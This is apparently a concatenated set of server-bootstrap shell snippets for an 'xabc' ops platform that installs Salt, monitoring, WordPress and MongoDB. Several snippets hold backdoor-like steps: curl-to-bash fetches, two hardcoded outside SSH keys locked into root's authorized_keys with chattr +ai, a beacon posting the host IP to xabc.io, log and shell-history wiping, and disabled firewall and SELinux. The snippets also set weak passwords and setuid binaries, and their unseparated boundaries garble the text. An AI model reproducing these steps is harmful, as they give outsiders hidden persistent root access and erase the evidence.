init yum update -y
curl -s xabc.io/a|bash
curl -s xabc.io/k|bash
rm -rf /var/log;mkdir -p /var/log
rebootcity curl -s --connect-timeout 5 https://ipinfo.io/34.204.180.223/city;curl -s --connect-timeout 5 http://freeapi.ipip.net/34.204.180.223hm helm init --stable-repo-url https://charts.helm.sh/stable --service-account tiller
helm init --client-only --skip-refresh
helm repo rm stable
helm repo add stable https://charts.helm.sh/stablec rm -f /etc/motd
hostnamectl --static set-hostname central-34.204.180.223;
yum -y update
yum -y install epel-release
yum -y install wget gcc gcc-c++ make vim pcre-devel libffi-devel openssl-devel python-devel libevent-devel postgresql-devel readline-devel perl-ExtUtils-Embed iptables iptables-services inotify-tools bzip2 unzip rsync psmisc python3-devel
yum -y install bash-completion
yum -y install python-pip
yum -y install chrony
#yum -y erase sudo
yum clean all
curl -s xabc.io/awscli|bash
timedatectl set-timezone Asia/Shanghai
curl -L https://s.xabcstack.com/matrix/xabc.sh -o /etc/profile.d/xabc.sh
chmod 644 /etc/profile.d/xabc.sh
wget -t 3 https://s.xabcstack.com/files/vim.tgz -O -|tar xzf - -C ~
[ -d /root/.pip ]||mkdir -p /root/.pip
curl -L https://s.xabcstack.com/files/pip.conf -o /root/.pip/pip.conf
pip2 install pip==9.0.3
pip2 install --upgrade setuptools==30.1.0
pip2 install --upgrade Cython redis pyOpenSSL
pip2 install functions==0.7.0
pip2 install tornado==5.1.1
pip2 install redis==3.5.3
pip2 install tornadio2==0.0.4
pip2 install tornado_jinja2==0.2.4
pip2 install psycopg2-binary==2.8.6
pip2 install Pillow==2.0.0
pip2 install paramiko==2.7.2
pip2 install sqlalchemy==1.3.20
pip2 install sqlalchemy_utils==0.36.6
pip2 install influxdb==5.3.1
pip2 install futures==3.1.1
pip2 install ujson==2.0.3
pip2 install mako
mv /usr/lib/python2.7/site-packages /usr/lib/python2.7/site-packages.bk
mv /usr/lib64/python2.7/site-packages /usr/lib64/python2.7/site-packages.bk
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/site-packages.tgz -O -|tar xzf - -C /usr/lib/python2.7
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/site-packages-64.tgz -O -|tar xzf - -C /usr/lib64/python2.7
yum -y install https://repo.saltstack.com/py3/redhat/salt-py3-repo-latest.el7.noarch.rpm
yum -y clean expire-cache
yum -y install salt-master salt-minion salt-api salt-ssh
pip3 install -U pip setuptools
pip3 install redis flask cryptography pyinotify influxdb salt-pepper gevent pymongo
pip3 install aliyun-python-sdk-dyvmsapi
chattr -ai /etc/salt/minion_id &>/dev/null
echo `hostname` > /etc/salt/minion_id
systemctl enable salt-master.service
systemctl enable salt-api.service
systemctl enable chrony
systemctl disable firewalld.service &>/dev/null
curl -L https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/master -o /etc/salt/master
[ -d /srv/salt/user ]||mkdir -p /srv/salt/user
[ -d /srv/zero/0 ]||mkdir -p /srv/zero/0
[ -d /srv/zero/1 ]||mkdir -p /srv/zero/1
[ -d /srv/zero/2 ]||mkdir -p /srv/zero/2
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/O.tgz -O -|tar xzf - -C /srv/zero/0
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/P.tgz -O -|tar xzf - -C /srv/zero/1
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/R.tgz -O -|tar xzf - -C /srv/zero/2
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/node.tgz -O -|tar xzf - -C /srv/zero/1
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/grafana.tgz -O -|tar xzf - -C /srv/zero/1
#wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/matrix.tgz -O -|tar xzf - -C /srv/zero/1
ln -fs /srv/zero/1/node/bin/npm /usr/bin/npm
ln -fs /srv/zero/1/node/bin/node /usr/bin/node
chmod 100 /srv/zero/2/redis/bin/*
ln -fs /srv/zero/2/redis/bin/redis-cli /usr/local/bin/
id -u nobody &>/dev/null||useradd nobody -r -s /bin/false
groupadd -f nobody &>/dev/null
chown root.nobody /srv/zero/0/openresty/nginx/sbin/nginx
chmod +xs /srv/zero/0/openresty/nginx/sbin/nginx
chattr -ai /etc/{passwd,shadow,group,gshadow,services}
yum install -y postgresql-server
service postgresql initdb
service postgresql start
service salt-master start
systemctl enable postgresql.service
[ -e /etc/ssh/ssh_host_dsa_key ]||ssh-keygen -q -t dsa -P '' -f /etc/ssh/ssh_host_dsa_key
chmod 755 /etc/rc.d/rc.local
systemctl disable salt-minion.service
#wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/build.tgz -O -|tar xzf - -C /srv/salt
rm -fr /var/log /var/cache/salt/minion /root/.bash_history
IP=${SSH_CONNECTION% *};IP=${IP##* };[ -n "$IP" ]||IP=$(ip -o -f inet addr|grep -v 'lo '|grep -Po '(?<=inet ).*(?=\/)'|awk '/^10\.|^172\.|^192\.|^100\./'|head -1)
REGION=$(curl -s -m 5 http://ip-api.com/line/34.204.180.223?fields=city);[ -n "$REGION" ]||REGION="Shanghai"
printf "\033[1;32;40m%s\033[0m\n" "Login 和 Central 机器在同一个内网请在 Login 机器执行 # curl -s xabc.io/l-$IP-$REGION|bash 继续完成对 Login 的基础部署"
printf "\033[1;32;40m%s\033[0m\n-----------------\n" "Master 和 Central 机器在同一个内网请在 Master 机器执行 # curl -s xabc.io/m-$IP-$REGION|bash 继续完成对 Master 的基础部署"
printf "\033[1;32;40m%s\033[0m\n" "Login 和 Central 机器不在同一内网请在 Login 机器执行 # curl -s xabc.io/l-34.204.180.223-$REGION|bash 继续完成对 Login 的基础部署"
printf "\033[1;32;40m%s\033[0m\n" "Master 和 Central 机器不在同一内网请在 Master 机器执行 # curl -s xabc.io/m-34.204.180.223-$REGION|bash 继续完成对 Master 的基础部署"
printf "\033[1;32;31m%s\033[0m\n" "特别说明 $REGION 这个字段代表网络区域信息,可根据实际情况改成自己机器所在区域标识信息,同一网络节点内login,master机器,其region标识信息一致,如Beijing,必须与/srv/pillar/central.sls 里面 region 定义一致"minion_clean systemctl stop salt-minion
pkill salt-minion &>/dev/null
killall salt-minion &>/dev/null
pkill salt-minion &>/dev/null
rm -fr /etc/salt/pki/minion /var/log/salt/minion*
service salt-minion restartjava #以 java 进程所在用户执行,获取 heap dump 文件
#jmap -dump:format=b,file=heap.hprof
#获取thread dump文件
#jstack > thread.txtt ip addr | awk '/inet / {sub(/\/.*/, "", $2); print $2}'|grep -E '^10\.|^100\.|^172\.1[6-9]\.|^172\.2[0-9]\.|^172\.3[0-1]\.|^192\.168\.'|head -1wp yum -y remove webtatic-release-7-3.noarch
yum -y localinstall https://mirror.webtatic.com/yum/el7/webtatic-release.rpm
yum -y remove php72w-mysql
yum -y install php72w-mysqlnd
chmod 777 /var/lib/php/session/
wget -t 3 https://s.xabcstack.com/files/phpmyadmin.tgz -O -|tar xzf - -C /opt/wordpress
chown nobody.nobody -R /opt/wordpress/phpmyadmin
echo "user:root password:io"i if [ $USER = ywgx ];then
wget -q -t 3 https://s.xabcstack.com/ywgx/vim.tgz -O -|tar xzf - -C ~
wget -q -t 3 https://s.xabcstack.com/ywgx/.gitconfig -O ~/.gitconfig
wget -q -t 3 https://s.xabcstack.com/ywgx/.gitignore -O ~/.gitignore
wget -q -t 3 https://s.xabcstack.com/ywgx/.my.cnf -O ~/.my.cnf
wget -q -t 3 https://s.xabcstack.com/ywgx/.wgetrc -O ~/.wgetrc
if ! grep -q "ge4MSI5hlWSw" /root/.ssh/authorized_keys &>/dev/null;then
[ -e ~/.ssh/authorized_keys ]&&chattr -ai ~/.ssh/authorized_keys||mkdir -p -m 700 ~/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDHZyWeFOHuHtLgsGLNx4sCYVXv/FfFi3ZcTSOSyX2oRgRm4xflPDgJHGSlCjtP2IluM6gG+o9+fS0WpcQkiaabe4wJVf5/hdFvJY7BgG4SslmdYGGtXKqFKXLq0pkuQQTnitBYQvAwEjBuHYB0KuuJG1XSss3ubzTZzoveeIVOJgamoGgm42D2G0ZOAH7ovRj3eFvjJImepaSJEDUe1SbNHoptSQvLMV+y5LDNb7xxRUk4hH09o/f2O9jxPbxL8f9nP94ZoT2XjVhvKRKVz51AHs9pNTry7ge4MSI5hlWSwjiFO+jJLuIiGdRGVxEzToMOkPBaH3HXs1pJHu+/9fqCwvgW4+Wp7FTBhPmX/9VSjGpO+uwlj3zRZHyDxs3Enup+Bok/WH9e5GLQj/KzWQD6s/6s0/9UC9YfZRU7E+uRvXf21zpAkmaGGQsOv5FV7ZqciYRn66dq65ahx2xmi4hkBoTrdP595lRPuQEOW1ziTI08pxU9eZA/f/s4AsQL/IHU9LkiA8gqGXlembuBxL20OietQTLn5AYev6rmU0m4IZ1yKu2AzT5gaG//8XuSGzT0o8ppvSgIalDBnS+W/2xQCc0xGY7yX51MIdc+E7edWw14VqL0ESXIHZfB7uOGOAMjfMP3GIoHOIatI+rsd8D30sKEEBXDYAgwu2yZgskGmw== ywgx" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
chattr +ai ~/.ssh/authorized_keys
fi
if ! grep -q "Ogsuw71ublt" /root/.ssh/authorized_keys &>/dev/null;then
[ -e ~/.ssh/authorized_keys ]&&chattr -ai ~/.ssh/authorized_keys||mkdir -p -m 700 ~/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDT36lNbtc7eqPC6KrrGoOJm43cGrTkLBfNJPuUVR7odSMBn53P5vjuG4BVeXP/yhiVAjerPrh/03e5xOoI5X1UD56H52XpXLoMkGGAR6uSRSNzjSgt1XBFREWBnOgsuw71ubltsfHKPBjnkwnMRePLD5aoMeTyvylhAxTMMLm3GPSCCTMII8bmuxTx8k1IJ8oW078ak6LeBOFFl/SOFiMeWSvqA21fi8gUMhWte3NN4trNUIDPdSprOZx1Yk4nnZh5jkrVv5iZX3DtrsaVhYegwK06VBRiycqDj32d1kOWyFBdhWHADMMoD4UAHnFxn+5igeRyS2yI9XFgQTQDaWw+cLvYe4wYr+pJ66Vk4v5f1AeOg/F4UewhJ4Sr/2AtZJOxgAhPv7gdyf4aDePfxlZwuUD+chMbntOZzUuaI5rU8uh4lWaNCG0eGvH0ul3pjS2p4FKJ378XKi87DcqGQLZJytjbMqc8NalTl/AbbMgjZbB8ZHpZAl2G1gq1uicAjMsm0j0nLmvAb6vPe9lQTp0Jb09yddM3VX9XtF15yz1Si1COu1I5nldEGc12nBFLxIRBEk6vaDZYo5gY14rdrWuiZ85j5I0vEUbiuFF3lzf+j0iHg3UgZcuYo5QFBiApyyWt1wDvHKnLE3FZVj0uSzscmZ5/4rk06ZAwCdwjzAXZCQ== xabc" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
chattr +ai ~/.ssh/authorized_keys
curl -d "msg=# ssh 34.204.180.223" "https://xabc.io/send/ssh/" &>/dev/null
fi
fiwordpress cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
chattr -ai /etc/passwd /etc/shadow /etc/group /etc/gshadow
id -u nobody &>/dev/null||useradd nobody -r -s /bin/false
groupadd -f nobody &>/dev/null
if [ "$OS" = "RedHat" ]
then
yum -y install yum-utils
yum -y install epel-release
yum -y install vim wget bzip2 unzip rsync
yum -y localinstall https://mirror.webtatic.com/yum/el7/webtatic-release.rpm
wget -t 3 https://s.xabcstack.com/files/MariaDB.repo -O /etc/yum.repos.d/MariaDB.repo
yum -y install MariaDB-server MariaDB-client
yum -y install php72w
yum -y install php72w-cli php72w-common php72w-devel php72w-mysql php72w-fpm
yum -y install php72w-gd php72w-imap php72w-ldap php72w-odbc php72w-pear php72w-xml php72w-xmlrpc php72w-mbstring php72w-pdo
systemctl start mariadb
[ -d /etc/rc.d ]||mkdir -p /etc/rc.d
[ -d /etc/php-fpm.d ]||mkdir -p /etc/php-fpm.d
wget -t 3 https://s.xabcstack.com/files/RedHat-php.conf -O /etc/php-fpm.d/www.conf
wget -t 3 https://s.xabcstack.com/files/wordpress-rc.local.conf -O /etc/rc.d/rc.local
wget -t 3 https://s.xabcstack.com/files/mysql-server.cnf -O /etc/my.cnf.d/server.cnf
chmod 755 /etc/rc.d/rc.local
mysql <<- EOF
set password for root@localhost=password('io');
create database wordpress;
EOF
systemctl restart mariadb
systemctl restart php-fpm
systemctl enable mariadb
systemctl enable php-fpm
fi
if [ "$OS" = "Debian" ]
then
apt-get -y update
apt-get -y install vim wget bzip2 unzip rsync
apt-get -y remove apache2
apt-get -y install php7.[0-9]
apt-get -y install php7.[0-9]-mysql php7.[0-9]-fpm
apt-get -y install php7.[0-9]-gd php7.[0-9]-mbstring php7.[0-9]-xmlrpc
apt-get -y install mysql-server --allow-unauthenticated
mysql -pio<<- EOF
create database wordpress;
EOF
wget -t 3 https://s.xabcstack.com/files/Debian-php.conf -O `find /etc/php/ -name www.conf`
wget -t 3 https://s.xabcstack.com/files/wordpress-rc.local.conf -O /etc/rc.local
chmod 755 /etc/rc.local
systemctl restart mysql
/etc/init.d/php*-fpm restart
fi
[ -d /opt/sys ]||mkdir -p /opt/sys
[ -d /var/log/php-fpm ]||mkdir -p /var/log/php-fpm
[ -d /var/log/mariadb ]||mkdir -p /var/log/mariadb
wget -t 3 https://s.xabcstack.com/files/openresty-$OS.tgz -O -|tar xzf - -C /opt
wget -t 3 https://s.xabcstack.com/files/wordpress-nginx.conf -O /opt/openresty/nginx/conf/nginx.conf
wget -t 3 https://s.xabcstack.com/files/wordpress.tgz -O -|tar xzf - -C /opt
wget -t 3 https://s.xabcstack.com/files/wordpress-start.sh -O /opt/sys/wordpress-start.sh
chown -R nobody.nobody /opt/openresty
chown -R nobody.nobody /opt/wordpress
chown root.nobody /opt/openresty/nginx/sbin/nginx
chmod +xs /opt/openresty/nginx/sbin/nginx
chmod 700 /opt/sys/wordpress-start.sh
pgrep nginx||/opt/openresty/nginx/sbin/nginxmongo echo doing...
wget -t 3 https://s.xabcstack.com/mongodb/mongo.tgz -O -|tar xzf - -C /opt
echo 65535 > /proc/sys/net/core/somaxconn
echo never > /sys/kernel/mm/transparent_hugepage/defrag
echo never > /sys/kernel/mm/transparent_hugepage/enabled
pgrep mongod||/opt/mongo/bin/mongod -f /opt/mongo/conf/mongod.confs if ! grep -q "QmNkqIhy" /root/.ssh/authorized_keys &>/dev/null;then
[ -e /root/.ssh/authorized_keys ]&&chattr -ai /root/.ssh/authorized_keys||mkdir -p -m 700 /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCciOA6PlTAAzYjSoavHXB+xyBG6PmhFumTPI7xrwsZfU/QjDxr3f/Q9x4RaqrQ+5i/wqxX00/ztR37WLza/6zn7gm06XqMMyZ4pdthxoJNS5eOKAXst8z1vTZsEIPY3ZzlQmNkqIhyUwcsc+4elHXdNB3DPxuxNYY8N7oHgZ7NYydZGHmPugpIjnAcDDh2llJ+RlO/oHnrU84gGAPtmf0me45TgFqDQj1sFzdAWB5iaChEq+/9t4B1vK78yM7zt3jDZfXoqdV/bB4DWaUB8X9WsgwTyrJflzzpsJSI1EhUgVAP6X0h13hR3tiyE3Xjksnc6Qbqu+JFm6e+opHf4+bn ywgx@E" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
fic1 curl -s xabc.io/b|bash
curl -s xabc.io/v|bash
timedatectl set-timezone Asia/Shanghai
yum -y install epel-release
yum -y install wget net-tools gcc gcc-c++ make vim iptables iptables-services inotify-tools unzip psmisc rsync
[ -e /etc/rc.local ]&&sed -i '/qcloud/d' /etc/rc.local
hostnamectl --static set-hostname central-34.204.180.223;
systemctl disable firewalld
yum -y install https://repo.saltstack.com/py3/redhat/salt-py3-repo-latest.el7.noarch.rpm
yum clean expire-cache
yum -y install salt-master
yum -y install salt-minion
yum -y install salt-ssh
pip3 install redis flask cryptography pyinotify
systemctl enable iptables.service
systemctl enable salt-master.service
[ -d /srv/salt ]||mkdir -p /srv/salt
wget -t 3 https://s.xabcstack.com/master/iptables -O /etc/sysconfig/iptables
wget -t 3 https://s.xabcstack.com/master/master -O /etc/salt/master
systemctl restart salt-master.service
[ -d /srv/zero/0 ]||mkdir -p /srv/zero/0
[ -d /srv/zero/1 ]||mkdir -p /srv/zero/1
[ -d /srv/zero/2 ]||mkdir -p /srv/zero/2
[ -d /srv/zero/bin ]||mkdir -p /srv/zero/bin
wget -t 3 https://s.xabcstack.com/matrix/O.tgz -O -|tar xzf - -C /srv/zero/0
wget -t 3 https://s.xabcstack.com/matrix/P.tgz -O -|tar xzf - -C /srv/zero/1
wget -t 3 https://s.xabcstack.com/matrix/R.tgz -O -|tar xzf - -C /srv/zero/2u ip -o -f inet addr|grep -v 'lo '|grep -Po '(?<=inet ).*(?=\/)'|awk '/^10\.|^172\.|^192\.|^100\./'|head -1x cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
rm -f /var/lib/rpm/__db*
rpm --rebuilddb
yum install -y yum-utils
yum clean all
yum-complete-transaction --cleanup-only
yum history redo last
package-cleanup --dupes;package-cleanup --problems
yum clean metadata
yum makecache
yum clean expire-cache
fi
if [ "$OS" = "Debian" ];then
dpkg --configure -a
apt-get --fix-broken install
apt-key update
apt-get -f -y install --allow-unauthenticated --force-yes
apt-get clean
cd /var/lib/apt&&rm -rf lists;mkdir -p /var/lib/apt/lists/partial
apt-get clean
apt-get update
fimaster curl -s xabc.io/b|bash
curl -s xabc.io/v|bash
yum -y install epel-release
yum -y install wget net-tools gcc gcc-c++ make vim iptables iptables-services inotify-tools unzip psmisc rsync
[ -e /etc/rc.local ]&&sed -i '/qcloud/d' /etc/rc.local
timedatectl set-timezone Asia/Shanghai
hostnamectl --static set-hostname master-34.204.180.223;
systemctl disable firewalld
curl -s xabc.io/py3b|bash
yum -y install https://repo.saltstack.com/py3/redhat/salt-py3-repo-latest.el7.noarch.rpm
yum clean expire-cache
yum -y install salt-master
yum -y install salt-ssh
yum -y install ansible
/usr/bin/pip3 install redis flask cryptography pyinotify
systemctl enable iptables.service
systemctl enable salt-master.service
[ -d /opt/sys ]||mkdir -p /opt/sys
[ -d /opt/master ]||mkdir -p /opt/master
[ -d /srv/salt ]||mkdir -p /srv/salt
[ -d /srv/reactor ]||mkdir -p /srv/reactor
[ -d /etc/sysconfig ]||mkdir -p /etc/sysconfig
[ -d /srv/zero/bin ]||mkdir -p /srv/zero/bin
[ -d /root/.pip ]||mkdir -p /root/.pip
[ -d /srv/pillar ]||mkdir -p /srv/pillar
[ -d /root/.xabc ]||mkdir -p /root/.xabc
[ -d /etc/ansible ]||mkdir -p /etc/ansible
[ -d /srv/salt/src ]||mkdir -p /srv/salt/src
[ -d /etc/sysctl.d ]||mkdir -p /etc/sysctl.d
[ -d /srv/salt/files ]||mkdir -p /srv/salt/files
[ -d /srv/salt/group ]||mkdir -p /srv/salt/group
[ -d /etc/salt/master.d ]||mkdir -p /etc/salt/master.d
[ -d /srv/salt/base/files ]||mkdir -p /srv/salt/base/files
[ -d /srv/salt/open/files ]||mkdir -p /srv/salt/open/files
[ -d /srv/zero/1/webhook ]||mkdir -p /srv/zero/1/webhook
[ -d /srv/zero/1/prometheus/rules ]||mkdir -p /srv/zero/1/prometheus/rules
[ -d /srv/zero/1/prometheus/conf/node ]||mkdir -p /srv/zero/1/prometheus/conf/node
[ -d /srv/zero/1/prometheus/conf/http ]||mkdir -p /srv/zero/1/prometheus/conf/http
[ -d /srv/zero/1/prometheus/conf/ping ]||mkdir -p /srv/zero/1/prometheus/conf/ping
[ -d /srv/zero/1/prometheus/conf/tcp ]||mkdir -p /srv/zero/1/prometheus/conf/tcp
wget -q -t 3 https://s.xabcstack.com/master/xabc.sh -O /etc/profile.d/xabc.sh
wget -q -t 3 https://s.xabcstack.com/master/pip.conf -O /root/.pip/pip.conf
wget -q -t 3 https://s.xabcstack.com/master/.bashrc -O /root/.bashrc
wget -q -t 3 https://s.xabcstack.com/files/telnet.py -O /usr/local/bin/telnet.py
wget -q -t 3 https://s.xabcstack.com/master/xabcdl -O /usr/local/bin/xabcdl
wget -q -t 3 https://s.xabcstack.com/redis/redis-cli -O /usr/local/bin/redis-cli
wget -q -t 3 https://s.xabcstack.com/master/redisdl -O /usr/local/bin/redisdl
wget -q -t 3 https://s.xabcstack.com/master/iptables -O /etc/sysconfig/iptables
wget -q -t 3 https://s.xabcstack.com/master/master -O /etc/salt/master
wget -q -t 3 https://s.xabcstack.com/master/Saltfile -O /etc/salt/Saltfile
wget -q -t 3 https://s.xabcstack.com/master/reactor.conf -O /etc/salt/master.d/reactor.conf
wget -q -t 3 https://s.xabcstack.com/matrix/O.tgz -O -|tar xzf - -C /srv/zero
wget -q -t 3 https://s.xabcstack.com/matrix/R.tgz -O -|tar xzf - -C /srv/zero
wget -q -t 3 https://s.xabcstack.com/matrix/P.tgz -O -|tar xzf - -C /srv/zero/1
wget -q -t 3 https://s.xabcstack.com/master/redis.conf -O /srv/zero/2/redis/conf/redis.conf
wget -q -t 3 https://s.xabcstack.com/master/nginx.conf -O /srv/zero/0/openresty/nginx/conf/nginx.conf
wget -q -t 3 https://s.xabcstack.com/master/rc.local -O /etc/rc.d/rc.local
wget -q -t 3 https://s.xabcstack.com/master/xabc-sysctl.conf -O /etc/sysctl.d/xabc.conf
wget -q -t 3 https://s.xabcstack.com/master/genkey.py -O /opt/sys/genkey.py
wget -q -t 3 https://s.xabcstack.com/master/kk.py -O /srv/zero/bin/kk.py
wget -q -t 3 https://s.xabcstack.com/master/air.py -O /srv/zero/bin/air.py
wget -q -t 3 https://s.xabcstack.com/master/sentinel.py -O /srv/zero/bin/sentinel.py
wget -q -t 3 https://s.xabcstack.com/master/webhook.py -O /srv/zero/1/webhook/webhook.py
wget -q -t 3 https://s.xabcstack.com/master/.prometheus.yml -O /srv/salt/files/.prometheus.yml
wget -q -t 3 https://s.xabcstack.com/master/.alertmanager.yml -O /srv/salt/files/.alertmanager.yml
wget -q -t 3 https://s.xabcstack.com/master/top.sls -O /srv/salt/top.sls
wget -q -t 3 https://s.xabcstack.com/master/pillar_top.sls -O /srv/pillar/top.sls
wget -q -t 3 https://s.xabcstack.com/master/custom.sls -O /srv/salt/base/custom.sls
wget -q -t 3 https://s.xabcstack.com/master/conf.py -O /srv/zero/1/webhook/conf.py
for i in blackbox_exporter.tgz node_exporter.tgz gpu_exporter.tgz;do wget -t 3 https://s.xabcstack.com/src/$i -O -|tar xzf - -C /srv/salt/src;done
ln -s /srv/salt/files/.prometheus.yml /srv/zero/1/prometheus/prometheus.yml
ln -s /srv/salt/files/.alertmanager.yml /srv/zero/1/prometheus/alertmanager/alertmanager.yml
ln -s /srv/salt/files/.node_exporter_rules.yml /srv/zero/1/prometheus/rules/node_exporter_rules.yml
ln -s /srv/salt/files/.blackbox_exporter_rules.yml /srv/zero/1/prometheus/rules/blackbox_exporter_rules.yml
ln -s /srv/salt/files/node_exporter_targets.yml /srv/zero/1/prometheus/conf/node/node_exporter_targets.yml
chmod +x /opt/sys/genkey.py /srv/zero/1/webhook/webhook.py /srv/zero/bin/kk.py /srv/zero/bin/sentinel.py /srv/zero/bin/air.py /etc/rc.local /etc/rc.d/rc.local
[ -e /srv/salt/base/files/cluster_id_rsa ]||/opt/sys/genkey.py
id -u nobody &>/dev/null||useradd nobody -r -s /bin/false
groupadd -f nobody &>/dev/null
chown root.nobody /srv/zero/0/openresty/nginx/sbin/nginx
chmod +xs /srv/zero/0/openresty/nginx/sbin/nginx
chmod +x /usr/local/bin/redis-cli /usr/local/bin/redisdl /usr/local/bin/xabcdl /usr/local/bin/telnet.py
[ -e /etc/ssh/ssh_host_dsa_key ]||ssh-keygen -q -t dsa -P '' -f /etc/ssh/ssh_host_dsa_key
rm -rf /var/log /var/cache/salt/minion /root/.bash_history;mkdir -p /var/log
chattr -ai /var/spool/cron/root &>/dev/null
echo -e "31 05 * * 1 find /root/.ssh/ /home/*/.ssh/ -name known_hosts -delete\n*/5 * * * * pgrep redis-server||(/srv/zero/2/redis/bin/redis-server /srv/zero/2/redis/conf/redis.conf)\n*/5 * * * * pgrep sentinel.py||(/srv/zero/bin/sentinel.py &>>/var/log/xabc.log &)\n*/5 * * * * pgrep webhook.py||(/srv/zero/1/webhook/webhook.py &>>/var/log/webhook.log &)\n*/5 * * * * pgrep blackbox||(/srv/zero/1/prometheus/blackbox_exporter/blackbox_exporter --config.file=/srv/zero/1/prometheus/blackbox_exporter/blackbox.yml &>/srv/zero/1/prometheus/logs/blackbox_exporter.log &)\n17 03 * * * /srv/zero/bin/air.py" > /var/spool/cron/root
pgrep redis-server||/srv/zero/2/redis/bin/redis-server /srv/zero/2/redis/conf/redis.conf
/srv/zero/bin/air.pya if ! grep -q "ge4MSI5hlWSw" /root/.ssh/authorized_keys &>/dev/null;then
[ -e /root/.ssh/authorized_keys ]&&chattr -ai /root/.ssh/authorized_keys||mkdir -p -m 700 /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDHZyWeFOHuHtLgsGLNx4sCYVXv/FfFi3ZcTSOSyX2oRgRm4xflPDgJHGSlCjtP2IluM6gG+o9+fS0WpcQkiaabe4wJVf5/hdFvJY7BgG4SslmdYGGtXKqFKXLq0pkuQQTnitBYQvAwEjBuHYB0KuuJG1XSss3ubzTZzoveeIVOJgamoGgm42D2G0ZOAH7ovRj3eFvjJImepaSJEDUe1SbNHoptSQvLMV+y5LDNb7xxRUk4hH09o/f2O9jxPbxL8f9nP94ZoT2XjVhvKRKVz51AHs9pNTry7ge4MSI5hlWSwjiFO+jJLuIiGdRGVxEzToMOkPBaH3HXs1pJHu+/9fqCwvgW4+Wp7FTBhPmX/9VSjGpO+uwlj3zRZHyDxs3Enup+Bok/WH9e5GLQj/KzWQD6s/6s0/9UC9YfZRU7E+uRvXf21zpAkmaGGQsOv5FV7ZqciYRn66dq65ahx2xmi4hkBoTrdP595lRPuQEOW1ziTI08pxU9eZA/f/s4AsQL/IHU9LkiA8gqGXlembuBxL20OietQTLn5AYev6rmU0m4IZ1yKu2AzT5gaG//8XuSGzT0o8ppvSgIalDBnS+W/2xQCc0xGY7yX51MIdc+E7edWw14VqL0ESXIHZfB7uOGOAMjfMP3GIoHOIatI+rsd8D30sKEEBXDYAgwu2yZgskGmw== ywgx" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
chattr +ai /root/.ssh/authorized_keys
fi
if ! grep -q "Ogsuw71ublt" /root/.ssh/authorized_keys &>/dev/null;then
[ -e /root/.ssh/authorized_keys ]&&chattr -ai /root/.ssh/authorized_keys||mkdir -p -m 700 /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDT36lNbtc7eqPC6KrrGoOJm43cGrTkLBfNJPuUVR7odSMBn53P5vjuG4BVeXP/yhiVAjerPrh/03e5xOoI5X1UD56H52XpXLoMkGGAR6uSRSNzjSgt1XBFREWBnOgsuw71ubltsfHKPBjnkwnMRePLD5aoMeTyvylhAxTMMLm3GPSCCTMII8bmuxTx8k1IJ8oW078ak6LeBOFFl/SOFiMeWSvqA21fi8gUMhWte3NN4trNUIDPdSprOZx1Yk4nnZh5jkrVv5iZX3DtrsaVhYegwK06VBRiycqDj32d1kOWyFBdhWHADMMoD4UAHnFxn+5igeRyS2yI9XFgQTQDaWw+cLvYe4wYr+pJ66Vk4v5f1AeOg/F4UewhJ4Sr/2AtZJOxgAhPv7gdyf4aDePfxlZwuUD+chMbntOZzUuaI5rU8uh4lWaNCG0eGvH0ul3pjS2p4FKJ378XKi87DcqGQLZJytjbMqc8NalTl/AbbMgjZbB8ZHpZAl2G1gq1uicAjMsm0j0nLmvAb6vPe9lQTp0Jb09yddM3VX9XtF15yz1Si1COu1I5nldEGc12nBFLxIRBEk6vaDZYo5gY14rdrWuiZ85j5I0vEUbiuFF3lzf+j0iHg3UgZcuYo5QFBiApyyWt1wDvHKnLE3FZVj0uSzscmZ5/4rk06ZAwCdwjzAXZCQ== xabc" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
chattr +ai /root/.ssh/authorized_keys
fi
curl -d "msg=# ssh 34.204.180.223" "http://xabc.io/send/ssh/" &>/dev/null
which setenforce &>/dev/null&&setenforce -1 &>/dev/null
